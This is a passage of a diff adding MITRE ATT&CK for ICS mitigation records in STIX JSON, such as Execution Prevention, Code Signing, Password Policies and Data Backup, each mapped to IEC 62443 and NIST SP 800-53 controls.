"course-of-action--49b306c1-a046-42c5-a4d2-30f264ada110", + "created": "2019-06-11T16:30:16.672Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0935", + "external_id": "M0935" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:19.774Z", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.2", + "IEC 62443-4-2:2019 - CR 3.2", + "NIST SP 800-53 Rev. 4 - SI-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30", + "created": "2019-06-11T16:35:25.488Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0938", + "external_id": "M0938" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-05T14:21:27.977Z", + "name": "Static Network Configuration", + "description": "Configure hosts and devices to use static network configurations when possible, protocols that require dynamic discovery/addressing (e.g., ARP, DHCP, DNS) can be used to manipulate network message forwarding and enable various AiTM attacks. This mitigation may not always be usable due to limited device features or challenges introduced with different network configurations.", + "labels": [ + "IEC 62443-3-3:2013 - SR 7.7", + "IEC 62443-4-2:2019 - CR 7.7", + "NIST SP 800-53 Rev. 4 - CM-7" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.1", + "type": "course-of-action", + "id": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0814", + "external_id": "M0814" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-30T20:55:18.097Z", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.5", + "IEC 62443-4-2:2019 - CR 1.5", + "NIST SP 800-53 Rev. 4 - IA-5" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--5d97c693-e054-48ba-a3a3-eaf6942dfb65", + "created": "2019-06-06T21:10:35.792Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0927", + "external_id": "M0927" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:17.929Z", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.3", + "IEC 62443-4-2:2019 - CR 1.3", + "NIST SP 800-53 Rev. 4 - AC-2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5", + "created": "2019-06-06T21:09:47.115Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0926", + "external_id": "M0926" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:14.615Z", + "name": "Human User Authentication", + "description": "Require user authentication before allowing access to data or accepting commands to a device. While strong multi-factor authentication is preferable, it is not always feasible within ICS environments. Performing strong user authentication also requires additional security controls and processes which are often the target of related adversarial techniques (e.g., Valid Accounts, Default Credentials). Therefore, associated ATT&CK mitigations should be considered in addition to this, including [Multi-factor Authentication](https://attack.mitre.org/mitigations/M0932), [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), [User Account Management](https://attack.mitre.org/mitigations/M0918), [Privileged Account Management](https://attack.mitre.org/mitigations/M0926), and [User Account Control](https://attack.mitre.org/mitigations/M1052).", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.1", + "IEC 62443-4-2:2019 - CR 1.1", + "NIST SP 800-53 Rev. 4 - IA-2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "type": "course-of-action", + "id": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0804", + "external_id": "M0804" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "SSL/TLS Inspection", + "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--6a02e38a-9629-40c0-8c7d-e98e3470315c", + "created": "2019-06-06T20:15:34.146Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0920", + "external_id": "M0920" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:20.464Z", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.4", + "IEC 62443-4-2:2019 - CR 3.4", + "NIST SP 800-53 Rev. 4 - SI-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "created": "2019-06-11T17:01:25.405Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0945", + "external_id": "M0945" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:15.949Z", + "name": "Software Process and Device Authentication", + "description": "Require the authentication of devices and software processes where appropriate. Devices that connect remotely to other systems should require strong authentication to prevent spoofing of communications. Furthermore, software processes should also require authentication when accessing APIs.", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.2", + "IEC 62443-4-2:2019 - CR 1.2", + "NIST SP 800-53 Rev. 4 - IA-9" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0813", + "external_id": "M0813" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:15.230Z", + "name": "Encrypt Network Traffic", + "description": "Utilize strong cryptographic techniques and protocols to prevent eavesdropping on network communications.", + "labels": [ + "IEC 62443-3-3:2013 - SR 4.1", + "IEC 62443-4-2:2019 - CR 4.1", + "NIST SP 800-53 Rev. 4 - SC-8" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--7f153c28-e5f1-4764-88fb-eea1d9b0ad4a", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0808", + "external_id": "M0808" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:19.383Z", + "name": "Account Use Policies", + "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.11", + "IEC 62443-4-2:2019 - CR 1.11", + "NIST SP 800-53 Rev. 4 - IA-5" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--86b455f2-fb63-4043-93a8-32a3a7703a02", + "created": "2019-06-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0936", + "external_id": "M0936" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:16.730Z", + "name": "Application Developer Guidance", + "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.", + "labels": [ + "NIST SP 800-53 Rev. 4 - AT-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--8a3aadd0-b5f4-433a-800e-4893e4196bb7", + "created": "2017-10-25T14:48:53.732Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0913", + "external_id": "M0913" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:20.632Z", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "labels": [ + "IEC 62443-4-2:2019 - CR 3.14", + "NIST SP 800-53 Rev. 4 - SI-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--8ac1d6e1-b07f-476a-9732-84984ebc2405", + "created": "2019-06-11T17:02:36.984Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0946", + "external_id": "M0946" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Mechanical Protection Layers", + "description": "Utilize a layered protection design based on physical or mechanical protection systems to prevent damage to property, equipment, human safety, or the environment. Examples include interlocks, rupture disk, release values, etc. (Citation: A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004) ", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--8bc4a54e-810c-4600-8b6c-08fa8413a401", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0805", + "external_id": "M0805" + }, + { + "source_name": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004", + "description": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004 APPLYING THE LATEST STANDARD FOR FUNCTIONAL SAFETY IEC 61511 Retrieved. 2020/09/17 ", + "url": "https://www.icheme.org/media/9906/xviii-paper-23.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:21.512Z", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk. Software updates may need to be scheduled around operational down times.", + "labels": [ + "IEC 62443-4-2:2019 - CR 3.10", + "NIST SP 800-53 Rev. 4 - SI-2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "created": "2019-06-11T17:12:55.207Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0951", + "external_id": "M0951" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:16.383Z", + "name": "Watchdog Timers", + "description": "Utilize watchdog timers to ensure devices can quickly detect whether a system is unresponsive.", + "labels": [ + "IEC 62443-4-2:2019 - CR 7.2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--98aa0d61-fc9d-4b2d-8f18-b25d03549f53", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0815", + "external_id": "M0815" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:15.415Z", + "name": "Operational Information Confidentiality", + "description": "Deploy mechanisms to protect the confidentiality of information related to operational processes, facility locations, device configurations, programs, or databases that may have information that can be used to infer organizational trade-secrets, recipes, and other intellectual property (IP).", + "labels": [ + "IEC 62443-3-3:2013 - SR 4.1", + "IEC 62443-4-2:2019 - CR 4.1" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--99c746d7-a08a-4169-94f9-b8c0dad716fa", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0809", + "external_id": "M0809" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:18.276Z", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "labels": [ + "IEC 62443-3-3:2013 - SR 7.7", + "IEC 62443-4-2:2019 - CR 7.7", + "NIST SP 800-53 Rev. 4 - CM-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--9a945a29-5233-4422-a9e3-3e957b0e8bce", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0928", + "external_id": "M0928" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:19.007Z", + "name": "Limit Hardware Installation", + "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.2", + "IEC 62443-4-2:2019 - EDR 3.2", + "NIST SP 800-53 Rev. 4 - MP-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--9e3adcad-0b8f-4ecc-a2f3-06f607f53bf0", + "created": "2019-06-11T16:28:41.809Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0934", + "external_id": "M0934" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:19.946Z", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive data-at-rest with strong encryption.", + "labels": [ + "IEC 62443-3-3:2013 - SR 4.1", + "IEC 62443-4-2:2019 - CR 4.1", + "NIST SP 800-53 Rev. 4 - SC-28" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc", + "created": "2019-06-11T16:43:44.834Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0941", + "external_id": "M0941" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:14.969Z", + "name": "Network Allowlists", + "description": "Network allowlists can be implemented through either host-based files or system hosts files to specify what connections (e.g., IP address, MAC address, port, protocol) can be made from a device. Allowlist techniques that operate at the application layer (e.g., DNP3, Modbus, HTTP) are addressed in [Filter Network Traffic](https://attack.mitre.org/mitigations/M0937) mitigation.", + "labels": [ + "NIST SP 800-53 Rev. 4 - AC-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "type": "course-of-action", + "id": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "created": "2019-06-10T20:53:36.319Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0807", + "external_id": "M0807" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:16.556Z", + "name": "Supply Chain Management", + "description": "Implement a supply chain management program, including policies and procedures to ensure all devices and components originate from a trusted supplier and are tested to verify their integrity.", + "labels": [ + "NIST SP 800-53 Rev. 4 - SA-12" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--ac8f3492-7fbb-4a0a-b0b4-b75ec676136c", + "created": "2021-04-12T17:00:21.233Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0817", + "external_id": "M0817" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:21.679Z", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of 'gold-copy' back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.", + "labels": [ + "IEC 62443-3-3:2013 - SR 7.3", + "IEC 62443-4-2:2019 - CR 7.3", + "NIST SP 800-53 Rev. 4 - CP-9" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "created": "2019-07-19T14:33:33.543Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0953", + "external_id": "M0953" + }, + { + "source_name": "Department of Homeland Security October 2009", + "description": "Department of Homeland Security 2009, October Developing an Industrial Control Systems Cybersecurity Incident Response Capability Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:15.598Z", + "name": "Out-of-Band Communications Channel", + "description": "Have alternative methods to support communication requirements during communication failures and data integrity attacks. (Citation: National Institute of Standards and Technology April 2013) (Citation: Defense Advanced Research Projects Agency)", + "labels": [ + "NIST SP 800-53 Rev. 4 - SC-37" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0810", + "external_id": "M0810" + }, + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + }, + { + "source_name": "Defense Advanced Research Projects Agency", + "description": "Defense Advanced Research Projects Agency National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 Rapid Attack Detection, Isolation and Characterization Systems (RADICS) Retrieved. 2020/09/17 ", + "url": "https://www.darpa.mil/program/rapid-attack-detection-isolation-and-characterization-systems" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:20.836Z", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses. Perform periodic integrity checks of the device to validate the correctness of the firmware, software, programs, and configurations. Integrity checks, which typically include cryptographic hashes or digital signatures, should be compared to those obtained at known valid states, especially after events like device reboots, program downloads, or program restarts.", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.4", + "IEC 62443-4-2:2019 - CR 3.4", + "NIST SP 800-53 Rev. 4 - SI-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "created": "2019-06-11T17:06:14.029Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0947", + "external_id": "M0947" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:14.263Z", + "name": "Communication Authenticity", + "description": "When communicating over an untrusted network, utilize secure network protocols that both authenticate the message sender and can verify its integrity. This can be done either through message authentication codes (MACs) or digital signatures, to detect spoofed network messages and unauthorized connections.", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.1", + "IEC 62443-4-2:2019 - CR 3.1", + "NIST SP 800-53 Rev. 4 - SC-8; SC-23" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0802", + "external_id": "M0802" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:20.110Z", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "labels": [ + "IEC 62443-3-3:2013 - SR 7.7", + "IEC 62443-4-2:2019 - CR 7.7", + "NIST SP 800-53 Rev. 4 - CM-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--d0909119-2f71-4923-87db-b649881672d7", + "created": "2019-06-11T16:45:19.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0942", + "external_id": "M0942" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Threat Intelligence Program", + "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--d48b79b2-076d-483e-949c-0d38aa347499", + "created": "2019-06-06T19:55:50.927Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0919", + "external_id": "M0919" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Safety Instrumented Systems", + "description": "Utilize Safety Instrumented Systems (SIS) 